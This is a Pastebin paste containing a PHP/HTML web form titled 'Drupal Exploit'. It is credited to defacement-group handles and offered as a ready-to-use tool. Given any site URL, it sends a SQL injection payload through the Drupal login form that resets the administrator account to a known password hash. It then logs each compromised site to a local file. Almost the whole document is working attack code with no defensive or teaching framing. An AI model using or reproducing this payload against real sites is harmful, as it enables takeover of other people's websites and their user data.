Guest User

Drupal Exploit / Monta

a guest
Dec 20th, 2014
253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.81 KB | None | 0 0
  1.   <!Doctype HTML>
  2. <html>
  3. <head>
  4.     <title>Drupal Exploit</title>
  5. <body style="background-image: url('http://geekyard.com/Download/Hackers_Wallpaper_5.jpg'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  6.   <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  7.     <style type="text/css">
  8.     .mymargin{
  9.         margin-top:100px;
  10.         color:white;
  11.         font-family: monospace;
  12.     }
  13.     body {
  14.         font-family: 'Audiowide', serif;
  15.         font-size: 20px;
  16.        
  17.       }
  18.     </style>
  19. </head>
  20. <body>
  21.     <div class="mymargin">
  22.         <center>
  23.             <font color="#00FF66"><h1>Drupal Exploit</h1></font>
  24.              
  25.     <form method="GET" action="">
  26.         Site : <input type="text" name="url" placeholder="Example: www.site.com">
  27.         <input type="submit" name="submit" value="submit">
  28.     </form>
  29.     <br>
  30. <?php
  31.  
  32.  
  33. if(isset($_GET['submit'])){
  34.  
  35.     $url = "http://".$_GET['url']."/";
  36.     $post_data = "name[0;update users set name %3D 'admin' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  37.     $params = array(
  38.         'http' => array(
  39.         'method' => 'POST',
  40.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  41.         'content' => $post_data
  42.         )
  43.     );
  44.     $ctx = stream_context_create($params);
  45.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  46.     echo "<h4>Scanning at \"Index</h4>\"";
  47.     if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {$fp = fopen("D:/xampp/htdocs/misc/DRUPAL-HACKED.txt", 'a');
  48.     echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
  49. echo '<font color="#00FF66">Finished scanning. check =>  </font><a href="D:/xampp/htdocs/misc/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  50.  fwrite($fp, "Success! User:anonghost Pass:admin -> {$url}/user/login");
  51.                 fwrite($fp, "
  52. ");
  53.                 fwrite($fp, "======================================Donnazmi==============================================================");
  54.                 fwrite($fp, "
  55. ");
  56.                 fclose($fp);
  57.     } else {
  58.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  59.     }
  60. }
  61. ?>
  62. <br>
  63.     <font face="Audiowide" color="#00FF66" size="2">
  64. <font color="#00FF66">Orignal Code was with Some Bug i jux refined it | rummykhan </font><br />
  65. Edited : <font color="white">Donnazmi</font> <font color="white">|</font> Twitter: <font color="white"><a href="https://twitter.com/ungku_nazmi">Dondon xD</a></font><br /><br />
  66. <br > <font color="#00FF66">For more www.anonghost.gov</font>
  67. <br />visit <a href="http://google.com" target="_blank" style="text-decoration: none;">www.anonghost.gov</a>
  68. </font>
  69.     </div>
  70.  
  71. </body>
  72. </html>
Add Comment
Please, Sign In to add comment